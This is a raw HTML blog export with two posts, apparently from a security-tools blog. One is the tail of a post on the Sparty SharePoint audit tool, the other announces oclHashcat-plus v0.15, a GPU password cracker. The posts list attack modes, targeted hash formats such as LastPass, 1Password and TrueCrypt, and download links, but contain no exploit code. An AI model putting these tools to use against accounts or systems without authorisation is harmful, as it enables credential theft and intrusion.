<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">File Enumeration!<l1></l1></span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">File Uploading Check!</span></li>
</ul>
<h3 style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin-bottom: 16px;">
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Documentation - Usage Examples:</span></h3>
<ul style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Detailed examples have been shown here: <b><a href="http://sparty.secniche.org/usage.html" style="outline: none;">Sparty Usage.</a></b></span></li>
</ul>
<h3 style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin-bottom: 16px;">
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Download !</span></h3>
<ul style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="margin-bottom: 0.5em;"><b><a href="http://sparty.secniche.org/sparty_v_0.1.tar.gz" style="outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;">Sparty Version 0.1</span></a></b></li>
</ul>
<h3 style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin-bottom: 16px;">
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Installation !</span></h3>
<ul style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Step 1: # gunzip sparty_v_0.1.tar.gz</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Step 2: # tar -xvf sparty_v_0.1.tar</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Avoid using : # tar zxvf sparty_v_0.1.tar.gz</span></li>
</ul>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<a href="http://sparty.secniche.org/" style="color: #d86513; outline: none;"><span style="background-color: white; color: black; font-family: Georgia, 'Times New Roman', serif;">http://sparty.secniche.org/</span></a></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-9672636555820328882013-09-02T13:42:00.003-07:002013-09-02T13:42:35.308-07:00OclHashcat-plus v0.15 released<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">OclHashcat-plus is a GPGPU-based multi-hash cracker using a brute-force attack (implemented as <a href="http://hashcat.net/wiki/doku.php?id=mask_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="mask_attack">mask attack</a>), <a href="http://hashcat.net/wiki/doku.php?id=combinator_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="combinator_attack">combinator attack</a>, <a href="http://hashcat.net/wiki/doku.php?id=dictionary_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="dictionary_attack">dictionary attack</a>, <a href="http://hashcat.net/wiki/doku.php?id=hybrid_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="hybrid_attack">hybrid attack</a>, <a href="http://hashcat.net/wiki/doku.php?id=mask_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="mask_attack">mask attack</a>, and <a href="http://hashcat.net/wiki/doku.php?id=rule_based_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="rule_based_attack">rule-based attack</a>.</span></div>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">This version is the result of over 6 months of work, having modified 618,473 total lines of source code.</span></div>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Before we go into the details of the changes, here’s a quick summary of the major changes:</span></div>
<ul style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Added support for cracking passwords longer than 15 characters</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Added support for mask-files, which enables password policy-specific candidate generation using PACK</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Added support for multiple dictionaries in attack modes other than straight mode</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Rewrote workload dispatcher from scratch</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Rewrote restore support from scratch</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Rewrote kernel scheduler to reduce screen lags</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Better handling of smaller workloads/dictionaries</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Language-specific charset presets for use with masks</span></li>
</ul>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">New supported algorithms:</span></div>
<ul style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">TrueCrypt 5.0+</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">1Password</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Lastpass</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">OpenLDAP {SSHA512}</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">AIX {SMD5} and {SSHA*}</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">SHA256(Unix) aka sha256crypt</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">MacOSX v10.8</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Microsoft SQL Server 2012</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Microsoft EPi Server v4+</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Samsung Android Password/PIN</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">GRUB2</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">RipeMD160, Whirlpool, sha256-unicode, sha512-unicode, …</span></li>
</ul>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">New supported GPUs:</span></div>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">NVidia:</span></div>
<ul style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">All sm_35-based GPUs</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">GTX Titan</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">GTX 7xx</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Tesla K20</span></li>
</ul>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">AMD:</span></div>
<ul style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">All Caicos, Oland, Bonaire, Kalindi and Hainan -based GPU/APU</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">hd77xx</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">hd8xxx</span></li>
</ul>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="font-family: Georgia, 'Times New Roman', serif;"><span style="background-color: white; line-height: 22px;">Download -</span></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="line-height: 15px;">oclHashcat-plus </span><a href="http://hashcat.net/files/oclHashcat-plus-0.15.7z" style="color: #999999; line-height: 15px; outline: none;">v0.15</a></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="font-family: Georgia, 'Times New Roman', serif;"><span style="background-color: white; line-height: 22px;">Source-</span></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://hashcat.net/oclhashcat-plus/" style="color: #d86513; outline: none;">http://hashcat.net/oclhashcat-plus/</a></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Screenshot -</span></div>
<div class="separator" style="background-color: #333333; clear: both; color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5nsHUNJey5bODIbuvL4PYs_hVaUM8EGZPfS-0sUBpmyvvHLpmW9dxg81Lccze_pIyA3IwIhXwJKKVz0y1JUAHhnuzexhVaxxURq4Fuf_qKm6Ce5EhDXmibMWF4gZAdBxJBCCyseNuLE1Y/s1600/oclhashcat-plus.png" imageanchor="1" style="clear: left; color: #ff8f39; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5nsHUNJey5bODIbuvL4PYs_hVaUM8EGZPfS-0sUBpmyvvHLpmW9dxg81Lccze_pIyA3IwIhXwJKKVz0y1JUAHhnuzexhVaxxURq4Fuf_qKm6Ce5EhDXmibMWF4gZAdBxJBCCyseNuLE1Y/s1600/oclhashcat-plus.png" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></a></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0